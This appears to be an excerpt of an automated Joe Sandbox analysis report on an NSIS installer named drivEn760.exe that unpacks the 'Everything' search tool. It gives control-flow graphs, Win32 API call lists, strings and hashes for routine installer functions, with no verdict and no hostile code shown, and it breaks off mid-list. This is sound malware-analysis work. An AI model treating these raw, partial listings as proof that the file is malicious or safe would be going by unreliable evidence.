                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\drivEn760.exe" $.tmp$1033$C:\Program Files\Everything$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\drivEn760.exe$C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 2292928366-2835036153
                                                                                                            • Opcode ID: b771b6d1e398e84ac5177c2d3d93500617573adaa23d8a8461df8c4b5d5bc202
                                                                                                            • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                                            • Opcode Fuzzy Hash: b771b6d1e398e84ac5177c2d3d93500617573adaa23d8a8461df8c4b5d5bc202
                                                                                                            • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 141 405809-405824 142 4059b3-4059ba 141->142 143 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 141->143 145 4059e4-4059f1 142->145 146 4059bc-4059de GetDlgItem CreateThread CloseHandle 142->146 163 4058f3-40590d SendMessageW * 2 143->163 164 40590f-405912 143->164 148 4059f3-4059f9 145->148 149 405a0f-405a19 145->149 146->145 151 405a34-405a3d call 40462b 148->151 152 4059fb-405a0a ShowWindow * 2 call 4045f9 148->152 153 405a1b-405a21 149->153 154 405a6f-405a73 149->154 167 405a42-405a46 151->167 152->149 158 405a23-405a2f call 40459d 153->158 159 405a49-405a59 ShowWindow 153->159 154->151 156 405a75-405a7b 154->156 156->151 165 405a7d-405a90 SendMessageW 156->165 158->151 161 405a69-405a6a call 40459d 159->161 162 405a5b-405a64 call 4056ca 159->162 161->154 162->161 163->164 170 405922-405939 call 4045c4 164->170 171 405914-405920 SendMessageW 164->171 172 405b92-405b94 165->172 173 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 165->173 180 40593b-40594f ShowWindow 170->180 181 40596f-405990 GetDlgItem SendMessageW 170->181 171->170 172->167 178 405ac3-405ad3 GetWindowRect 173->178 179 405ad6-405aeb TrackPopupMenu 173->179 178->179 179->172 183 405af1-405b08 179->183 184 405951-40595c ShowWindow 180->184 185 40595e 180->185 181->172 182 405996-4059ae SendMessageW * 2 181->182 182->172 186 405b0d-405b28 SendMessageW 183->186 187 405964-40596a call 4045f9 184->187 185->187 186->186 188 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 186->188 187->181 190 405b4f-405b76 SendMessageW 188->190 190->190 191 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 190->191 191->172
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                                                                            • GetClientRect.USER32(?,?), ref: 004058B3
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004059DE
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                                            • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                                            • CreatePopupMenu.USER32 ref: 00405A96
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                                            • EmptyClipboard.USER32 ref: 00405B31
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                                            • CloseClipboard.USER32 ref: 00405B8C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: H7B${$pg
                                                                                                            • API String ID: 590372296-2899556951
                                                                                                            • Opcode ID: 52cbb17928025f0c544e8cef57dfe715cf1101629750118a67e1dc10e69a1e88
                                                                                                            • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                                            • Opcode Fuzzy Hash: 52cbb17928025f0c544e8cef57dfe715cf1101629750118a67e1dc10e69a1e88
                                                                                                            • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 417 404ab5-404adf 418 404ae1-404aed call 405cac call 4068ef 417->418 419 404af2-404afc 417->419 418->419 420 404b6a-404b71 419->420 421 404afe-404b14 GetDlgItem call 405fae 419->421 425 404b77-404b80 420->425 426 404c48-404c4f 420->426 433 404b26-404b5f SetWindowTextW call 4045c4 * 2 call 4045f9 call 406a35 421->433 434 404b16-404b1e call 405fe2 421->434 429 404b82-404b8d 425->429 430 404b9a-404b9f 425->430 431 404c51-404c58 426->431 432 404c5e-404c79 call 405cac call 40603f 426->432 435 404b93 429->435 436 404df6-404e08 call 40462b 429->436 430->426 437 404ba5-404be7 call 4066a5 SHBrowseForFolderW 430->437 431->432 431->436 456 404c82-404c9a call 406668 call 406a35 432->456 457 404c7b 432->457 433->436 475 404b65-404b68 SHAutoComplete 433->475 434->433 449 404b20-404b21 call 405f37 434->449 435->430 450 404c41 437->450 451 404be9-404c03 CoTaskMemFree call 405f37 437->451 449->433 450->426 462 404c05-404c0b 451->462 463 404c2d-404c3f SetDlgItemTextW 451->463 473 404cd6-404ce7 call 406668 call 405fe2 456->473 474 404c9c-404ca2 456->474 457->456 462->463 466 404c0d-404c24 call 4066a5 lstrcmpiW 462->466 463->426 466->463 476 404c26-404c28 lstrcatW 466->476 489 404ce9 473->489 490 404cec-404d05 GetDiskFreeSpaceW 473->490 474->473 477 404ca4-404cb6 GetDiskFreeSpaceExW 474->477 475->420 476->463 479 404cb8-404cba 477->479 480 404d2e-404d48 477->480 483 404cbc 479->483 484 404cbf-404cd4 call 405f83 479->484 482 404d4a 480->482 486 404d4f-404d59 call 404f52 482->486 483->484 484->473 484->477 495 404d74-404d7d 486->495 496 404d5b-404d62 486->496 489->490 490->482 493 404d07-404d2c MulDiv 490->493 493->486 498 404daf-404db9 495->498 499 404d7f-404d8f call 404f3a 495->499 496->495 497 404d64 496->497 502 404d66-404d6b 497->502 503 404d6d 497->503 500 404dc5-404dcb 498->500 501 404dbb-404dc2 call 40140b 498->501 509 404da1-404daa SetDlgItemTextW 499->509 510 404d91-404d9a call 404e71 499->510 506 404dd0-404de1 call 4045e6 500->506 507 404dcd 500->507 501->500 502->495 502->503 503->495 516 404df0 506->516 517 404de3-404de9 506->517 507->506 509->498 515 404d9f 510->515 515->498 516->436 517->516 518 404deb call 404a0e 517->518 518->516
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001,00000008,00000000,?,00000014,?,?,00000001,?), ref: 00404B68
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                                            • lstrcmpiW.KERNEL32(Delete on reboot: ,00423748,00000000,?,?), ref: 00404C1C
                                                                                                            • lstrcatW.KERNEL32(?,Delete on reboot: ), ref: 00404C28
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                                                                              • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                              • Part of subcall function 004068EF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                            • GetDiskFreeSpaceExW.KERNELBASE(00421718,?,?,?,00000001,00421718,?,?,000003FB,?), ref: 00404CB1
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                              • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                              • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                              • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: A$C:\Program Files\Everything$Delete on reboot: $H7B$pg
                                                                                                            • API String ID: 4039761011-932901127
                                                                                                            • Opcode ID: d411b7e7397960d58536e35a9f4f22ef0176bfb2586233fd77df9836147bc2be
                                                                                                            • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                                            • Opcode Fuzzy Hash: d411b7e7397960d58536e35a9f4f22ef0176bfb2586233fd77df9836147bc2be
                                                                                                            • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 651 405d74-405d9a call 40603f 654 405db3-405dba 651->654 655 405d9c-405dae DeleteFileW 651->655 657 405dbc-405dbe 654->657 658 405dcd-405ddd call 406668 654->658 656 405f30-405f34 655->656 659 405dc4-405dc7 657->659 660 405ede-405ee3 657->660 666 405dec-405ded call 405f83 658->666 667 405ddf-405dea lstrcatW 658->667 659->658 659->660 660->656 662 405ee5-405ee8 660->662 664 405ef2-405efa call 40699e 662->664 665 405eea-405ef0 662->665 664->656 675 405efc-405f10 call 405f37 call 405d2c 664->675 665->656 670 405df2-405df6 666->670 667->670 671 405e02-405e08 lstrcatW 670->671 672 405df8-405e00 670->672 674 405e0d-405e29 lstrlenW FindFirstFileW 671->674 672->671 672->674 676 405ed3-405ed7 674->676 677 405e2f-405e37 674->677 691 405f12-405f15 675->691 692 405f28-405f2b call 4056ca 675->692 676->660 682 405ed9 676->682 679 405e57-405e6b call 406668 677->679 680 405e39-405e41 677->680 693 405e82-405e8d call 405d2c 679->693 694 405e6d-405e75 679->694 683 405e43-405e4b 680->683 684 405eb6-405ec6 FindNextFileW 680->684 682->660 683->679 687 405e4d-405e55 683->687 684->677 690 405ecc-405ecd FindClose 684->690 687->679 687->684 690->676 691->665 697 405f17-405f26 call 4056ca call 406428 691->697 692->656 702 405eae-405eb1 call 4056ca 693->702 703 405e8f-405e92 693->703 694->684 698 405e77-405e7b call 405d74 694->698 697->656 705 405e80 698->705 702->684 706 405e94-405ea4 call 4056ca call 406428 703->706 707 405ea6-405eac 703->707 705->684 706->684 707->684
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,00000000), ref: 00405D9D
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\*.*,?,?,75923420,75922EE0,00000000), ref: 00405DE5
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\*.*,?,?,75923420,75922EE0,00000000), ref: 00405E08
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\*.*,?,?,75923420,75922EE0,00000000), ref: 00405E0E
                                                                                                            • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\*.*,?,?,75923420,75922EE0,00000000), ref: 00405E1E
                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\*.*$\*.*
                                                                                                            • API String ID: 2035342205-2416672888
                                                                                                            • Opcode ID: 289cd794720750e683b659e452c035bb0613a8c638522424dba6aadcaa8155b3
                                                                                                            • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                                            • Opcode Fuzzy Hash: 289cd794720750e683b659e452c035bb0613a8c638522424dba6aadcaa8155b3
                                                                                                            • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                            • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                                            • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                            • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(75923420,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0), ref: 004069A9
                                                                                                            • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                            • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                                            • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                            • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 192 4040c5-4040d7 193 4040dd-4040e3 192->193 194 40423e-40424d 192->194 193->194 195 4040e9-4040f2 193->195 196 40429c-4042b1 194->196 197 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 194->197 200 4040f4-404101 SetWindowPos 195->200 201 404107-40410e 195->201 198 4042f1-4042f6 call 404610 196->198 199 4042b3-4042b6 196->199 197->196 214 4042fb-404316 198->214 203 4042b8-4042c3 call 401389 199->203 204 4042e9-4042eb 199->204 200->201 206 404110-40412a ShowWindow 201->206 207 404152-404158 201->207 203->204 228 4042c5-4042e4 SendMessageW 203->228 204->198 213 404591 204->213 215 404130-404143 GetWindowLongW 206->215 216 40422b-404239 call 40462b 206->216 209 404171-404174 207->209 210 40415a-40416c DestroyWindow 207->210 220 404176-404182 SetWindowLongW 209->220 221 404187-40418d 209->221 217 40456e-404574 210->217 219 404593-40459a 213->219 224 404318-40431a call 40140b 214->224 225 40431f-404325 214->225 215->216 226 404149-40414c ShowWindow 215->226 216->219 217->213 231 404576-40457c 217->231 220->219 221->216 227 404193-4041a2 GetDlgItem 221->227 224->225 232 40432b-404336 225->232 233 40454f-404568 DestroyWindow KiUserCallbackDispatcher 225->233 226->207 235 4041c1-4041c4 227->235 236 4041a4-4041bb SendMessageW IsWindowEnabled 227->236 228->219 231->213 237 40457e-404587 ShowWindow 231->237 232->233 234 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 232->234 233->217 264 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 KiUserCallbackDispatcher 234->264 265 40438b-404390 234->265 239 4041c6-4041c7 235->239 240 4041c9-4041cc 235->240 236->213 236->235 237->213 242 4041f7-4041fc call 40459d 239->242 243 4041da-4041df 240->243 244 4041ce-4041d4 240->244 242->216 247 404215-404225 SendMessageW 243->247 249 4041e1-4041e7 243->249 244->247 248 4041d6-4041d8 244->248 247->216 248->242 252 4041e9-4041ef call 40140b 249->252 253 4041fe-404207 call 40140b 249->253 260 4041f5 252->260 253->216 262 404209-404213 253->262 260->242 262->260 268 4043d1-4043d2 264->268 269 4043d4 264->269 265->264 270 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 268->270 269->270 271 404406-404417 SendMessageW 270->271 272 404419 270->272 273 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 271->273 272->273 273->214 284 404464-404466 273->284 284->214 285 40446c-404470 284->285 286 404472-404478 285->286 287 40448f-4044a3 DestroyWindow 285->287 286->213 288 40447e-404484 286->288 287->217 289 4044a9-4044d6 CreateDialogParamW 287->289 288->214 290 40448a 288->290 289->217 291 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 289->291 290->213 291->213 296 404535-404548 ShowWindow call 404610 291->296 298 40454d 296->298 298->217
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                                            • ShowWindow.USER32(?), ref: 00404121
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                                            • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                                            • DestroyWindow.USER32 ref: 00404160
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00404198
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 004041B3
